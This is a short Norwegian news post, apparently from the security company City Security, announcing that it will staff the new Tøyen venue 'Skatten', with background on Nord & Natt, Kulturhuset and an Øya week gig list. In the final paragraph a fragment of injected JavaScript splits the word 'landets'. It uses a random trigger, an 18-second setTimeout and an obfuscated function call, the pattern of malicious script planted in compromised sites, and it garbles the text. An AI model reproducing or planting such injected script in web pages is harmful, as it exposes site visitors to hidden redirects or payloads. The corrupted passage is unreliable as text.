Nord og Natt + Kulturhuset = SKATTEN!

City Security har fått vaktholdet på «Skatten» når det åpner om kort tid. Her skal vi levere ordensvakter. Vi gleder oss til å jobbe i nye og spennende lokaler sammen med Skatten.

Bakgrunn og historie:

Etter oppussing gjennom sommeren skifter Nord & Natt Tøyen navn til «Skatten» onsdag 15. august, med åpningsfest kl. 20.00 denne kvelden! Øystein & Tom, som har drevet Nord & Natt fra starten, har forent krefter med Kulturhuset for å lage et sted som kan bidra til mangfoldet på Tøyen Torg. Navnet til de 500m2 store lokalene mellom Tøyen T-bane og Tøyen Torg er inspirert av at lokalene en gang huset Skattedirektoratet et par år, og mange Osloborgere vil huske at det var her de stappet selvangivelsen i en luke i veggen like før fristen på åtti og nittitallet.
Skatten skal «alltid» være åpent, være lett å bruke og bidra til å synliggjøre verdiene i området ved å videreføre det beste fra nabolagstedet som forenes med energien fra aktivitetsbasert drift.
Lokalene bygges om med fokus på gjenbruk, flerbruk, entusiasme og aktivitet, har fått en ny scene der det tidligere var restaurant, og kan deles opp i tre flotte fleksible flerbruksrom til alle mulige arrangement. Litt som Kulturhuset på Youngstorget, men bedre!

PSST: det er mulig å sniktitte på lokalene under Øyafestivalen
ONSDAG 8.: Einar Idsøe Eidsvåg – TORSDAG 9.: Brenneriveien Lystbåtforening – FREDAG 10.: Vinny Villbass – LØRDAG 11: Saronia

-Kulturhuset åpnet ved Youngstorget i et nedlagt Postkontor i 2013 og etablerte seg raskt som en suksess. I mai i fjor ble virksomheten flyttet til en hel bygård i Youngsgate 6 med dobbelt så mye areal, og har stadfestet seg som et av landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andets mest aktive arrangementsted.
-Nord og Natt åpnet aug. 2015 som kaffebar og utvidet med restaurant des. 2015. Stedet har drevet selvstendig sted utenfor Nord-kjeden siden august 2016.